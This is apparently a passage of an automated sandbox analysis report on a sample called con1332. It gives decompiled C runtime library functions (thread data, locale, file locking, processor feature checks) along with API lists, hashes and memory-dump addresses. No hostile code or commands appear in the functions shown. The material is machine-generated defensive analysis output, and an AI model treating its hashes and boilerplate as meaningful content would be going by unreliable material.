                                                                                                                                                                                                                                    • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                    • Instruction ID: ef3179efe0fa66d2b47f84259548d7ce1fb736adc059c263de669045880c1037
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6016B3350062866C2A2EB785C4167D7BA1CF86B3036583CAD7709B5D0EB28C58AC955
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                    			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}







                                                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                                                    0x0041473a
                                                                                                                                                                                                                                    0x0041473f
                                                                                                                                                                                                                                    0x00414749
                                                                                                                                                                                                                                    0x0041474b
                                                                                                                                                                                                                                    0x00414753
                                                                                                                                                                                                                                    0x00414777
                                                                                                                                                                                                                                    0x00414779
                                                                                                                                                                                                                                    0x0041477f
                                                                                                                                                                                                                                    0x00414783
                                                                                                                                                                                                                                    0x00414786
                                                                                                                                                                                                                                    0x00414791
                                                                                                                                                                                                                                    0x00414794
                                                                                                                                                                                                                                    0x0041479b
                                                                                                                                                                                                                                    0x00414755
                                                                                                                                                                                                                                    0x00414755
                                                                                                                                                                                                                                    0x00414759
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041475b
                                                                                                                                                                                                                                    0x00414760
                                                                                                                                                                                                                                    0x00414760
                                                                                                                                                                                                                                    0x00414759
                                                                                                                                                                                                                                    0x00414765
                                                                                                                                                                                                                                    0x00414769
                                                                                                                                                                                                                                    0x0041476e
                                                                                                                                                                                                                                    0x00414776

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                    • String ID: @.B
                                                                                                                                                                                                                                    • API String ID: 3521780317-470711618
                                                                                                                                                                                                                                    • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                    • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02C0499F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 02C049AB
                                                                                                                                                                                                                                      • Part of subcall function 02C0099C: __getptd_noexit.LIBCMT ref: 02C0099F
                                                                                                                                                                                                                                      • Part of subcall function 02C0099C: __amsg_exit.LIBCMT ref: 02C009AC
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 02C049C2
                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 02C049D0
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 02C049E0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                    • String ID: @.B
                                                                                                                                                                                                                                    • API String ID: 3521780317-470711618
                                                                                                                                                                                                                                    • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                    • Instruction ID: 037f26a1135ee81d5cdf3a10987d837b9d429131fb4f0742e524f659b8c1f370
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F05931E40700DBDB74FB74884076E73A57F00721F41416AC744AB2E0CB70A901EF55
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02C04961 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 02C04973
                                                                                                                                                                                                                                    • ___removelocaleref.LIBCMT ref: 02C0497E
                                                                                                                                                                                                                                    • ___freetlocinfo.LIBCMT ref: 02C04992
                                                                                                                                                                                                                                      • Part of subcall function 02C046F0: ___free_lconv_mon.LIBCMT ref: 02C04736
                                                                                                                                                                                                                                      • Part of subcall function 02C046F0: ___free_lconv_num.LIBCMT ref: 02C04757
                                                                                                                                                                                                                                      • Part of subcall function 02C046F0: ___free_lc_time.LIBCMT ref: 02C047DC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                                                                                                                    • String ID: @.B$@.B
                                                                                                                                                                                                                                    • API String ID: 4212647719-183327057
                                                                                                                                                                                                                                    • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                                                    • Instruction ID: 15c4857eec824830106d92c1d3af0ad69900191de04954467aa2089334b7390d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AE02632D21A3105CA3D3B1C78C036B929E2FC3316B1B123EEA08E70C4DB644E80D4A8
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}













                                                                                                                                                                                                                                    0x0040c73d
                                                                                                                                                                                                                                    0x0040c690
                                                                                                                                                                                                                                    0x0040c692
                                                                                                                                                                                                                                    0x0040c697
                                                                                                                                                                                                                                    0x0040c69e
                                                                                                                                                                                                                                    0x0040c6a3
                                                                                                                                                                                                                                    0x0040c6a8
                                                                                                                                                                                                                                    0x0040c6aa
                                                                                                                                                                                                                                    0x0040c6c8
                                                                                                                                                                                                                                    0x0040c6ce
                                                                                                                                                                                                                                    0x0040c6d1
                                                                                                                                                                                                                                    0x0040c6d6
                                                                                                                                                                                                                                    0x0040c6dc
                                                                                                                                                                                                                                    0x0040c6df
                                                                                                                                                                                                                                    0x0040c70f
                                                                                                                                                                                                                                    0x0040c70f
                                                                                                                                                                                                                                    0x0040c6e1
                                                                                                                                                                                                                                    0x0040c6e2
                                                                                                                                                                                                                                    0x0040c6e8
                                                                                                                                                                                                                                    0x0040c6eb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c6ed
                                                                                                                                                                                                                                    0x0040c6ee
                                                                                                                                                                                                                                    0x0040c70b
                                                                                                                                                                                                                                    0x0040c70b
                                                                                                                                                                                                                                    0x0040c6eb
                                                                                                                                                                                                                                    0x0040c714
                                                                                                                                                                                                                                    0x0040c71b
                                                                                                                                                                                                                                    0x0040c71e
                                                                                                                                                                                                                                    0x0040c725
                                                                                                                                                                                                                                    0x0040c72a
                                                                                                                                                                                                                                    0x0040c72a
                                                                                                                                                                                                                                    0x0040c6ac
                                                                                                                                                                                                                                    0x0040c6ac
                                                                                                                                                                                                                                    0x0040c6b3
                                                                                                                                                                                                                                    0x0040c6b4
                                                                                                                                                                                                                                    0x0040c6b6
                                                                                                                                                                                                                                    0x0040c6b7
                                                                                                                                                                                                                                    0x0040c6b8
                                                                                                                                                                                                                                    0x0040c6b9
                                                                                                                                                                                                                                    0x0040c6ba
                                                                                                                                                                                                                                    0x0040c6bb
                                                                                                                                                                                                                                    0x0040c6c3
                                                                                                                                                                                                                                    0x0040c6c3
                                                                                                                                                                                                                                    0x0040c731

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2805327698-0
                                                                                                                                                                                                                                    • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                    • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                                    			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x4741638
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x4741638
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x4741638
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}










                                                                                                                                                                                                                                    0x00413fcc
                                                                                                                                                                                                                                    0x00413fcc
                                                                                                                                                                                                                                    0x00413fcc
                                                                                                                                                                                                                                    0x00413fcc
                                                                                                                                                                                                                                    0x00413fce
                                                                                                                                                                                                                                    0x00413fd3
                                                                                                                                                                                                                                    0x00413fdd
                                                                                                                                                                                                                                    0x00413fdf
                                                                                                                                                                                                                                    0x00413fe7
                                                                                                                                                                                                                                    0x00414008
                                                                                                                                                                                                                                    0x0041400e
                                                                                                                                                                                                                                    0x00414012
                                                                                                                                                                                                                                    0x00414015
                                                                                                                                                                                                                                    0x00414018
                                                                                                                                                                                                                                    0x0041401e
                                                                                                                                                                                                                                    0x00414020
                                                                                                                                                                                                                                    0x00414022
                                                                                                                                                                                                                                    0x00414025
                                                                                                                                                                                                                                    0x0041402b
                                                                                                                                                                                                                                    0x0041402d
                                                                                                                                                                                                                                    0x0041402f
                                                                                                                                                                                                                                    0x00414035
                                                                                                                                                                                                                                    0x00414037
                                                                                                                                                                                                                                    0x00414038
                                                                                                                                                                                                                                    0x0041403d
                                                                                                                                                                                                                                    0x00414035
                                                                                                                                                                                                                                    0x0041402d
                                                                                                                                                                                                                                    0x0041403e
                                                                                                                                                                                                                                    0x00414043
                                                                                                                                                                                                                                    0x00414046
                                                                                                                                                                                                                                    0x0041404c
                                                                                                                                                                                                                                    0x00414050
                                                                                                                                                                                                                                    0x00414050
                                                                                                                                                                                                                                    0x00414056
                                                                                                                                                                                                                                    0x0041405d
                                                                                                                                                                                                                                    0x00413fef
                                                                                                                                                                                                                                    0x00413fef
                                                                                                                                                                                                                                    0x00413fef
                                                                                                                                                                                                                                    0x00413ff4
                                                                                                                                                                                                                                    0x00413ff8
                                                                                                                                                                                                                                    0x00413ffd
                                                                                                                                                                                                                                    0x00414005

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(04741638), ref: 00414050
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                                                                                                                    • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                    • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02C04233 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 02C0423F
                                                                                                                                                                                                                                      • Part of subcall function 02C0099C: __getptd_noexit.LIBCMT ref: 02C0099F
                                                                                                                                                                                                                                      • Part of subcall function 02C0099C: __amsg_exit.LIBCMT ref: 02C009AC
                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 02C0425F
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 02C0426F
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 02C0428C
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00422D38), ref: 02C042B7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                                                                                                                    • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                    • Instruction ID: 250c76bf525b6a3d00094603b3682799b3303a4b921b8c8f9cd99b4371448a6d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2301D231F01621EBD739AB64D8847AFB760BF8C724F454055EA20A72E0C774AA81DFD9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02C01161 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $2$l
                                                                                                                                                                                                                                    • API String ID: 0-3132104027
                                                                                                                                                                                                                                    • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                                                                                                                                                                                    • Instruction ID: 6edb8640f239807636c8a6a498f953e1f020d16960245c84a3f0d053192f0fcf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8419D35C552A98EDF358A268CC83F8FBB2AB4131AF1801CAC49D6A1D1C7B54B86CF45
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BFFCBF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __calloc_crt
                                                                                                                                                                                                                                    • String ID: P$B$`$B
                                                                                                                                                                                                                                    • API String ID: 3494438863-235554963
                                                                                                                                                                                                                                    • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                                                    • Instruction ID: a846b63a456e3a2ef09bb559dd29c6a90dc9e0465c0ad1fab158db80500776d7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 651129373086255BE7648F2CBC50B753392EB84328B68527AE715CB6E4EB70D8874A48
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                                                                                                    			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                                                                                                    0x00413615
                                                                                                                                                                                                                                    0x0041361d
                                                                                                                                                                                                                                    0x00413634
                                                                                                                                                                                                                                    0x004135e0
                                                                                                                                                                                                                                    0x004135e9
                                                                                                                                                                                                                                    0x004135f5
                                                                                                                                                                                                                                    0x004135f8
                                                                                                                                                                                                                                    0x004135fb
                                                                                                                                                                                                                                    0x004135fd
                                                                                                                                                                                                                                    0x00413600
                                                                                                                                                                                                                                    0x00413605
                                                                                                                                                                                                                                    0x0041360f
                                                                                                                                                                                                                                    0x00413607
                                                                                                                                                                                                                                    0x0041360b
                                                                                                                                                                                                                                    0x0041360b
                                                                                                                                                                                                                                    0x0041361f
                                                                                                                                                                                                                                    0x00413625
                                                                                                                                                                                                                                    0x0041362d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041362f
                                                                                                                                                                                                                                    0x0041362f
                                                                                                                                                                                                                                    0x00413633
                                                                                                                                                                                                                                    0x00413633
                                                                                                                                                                                                                                    0x0041362d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
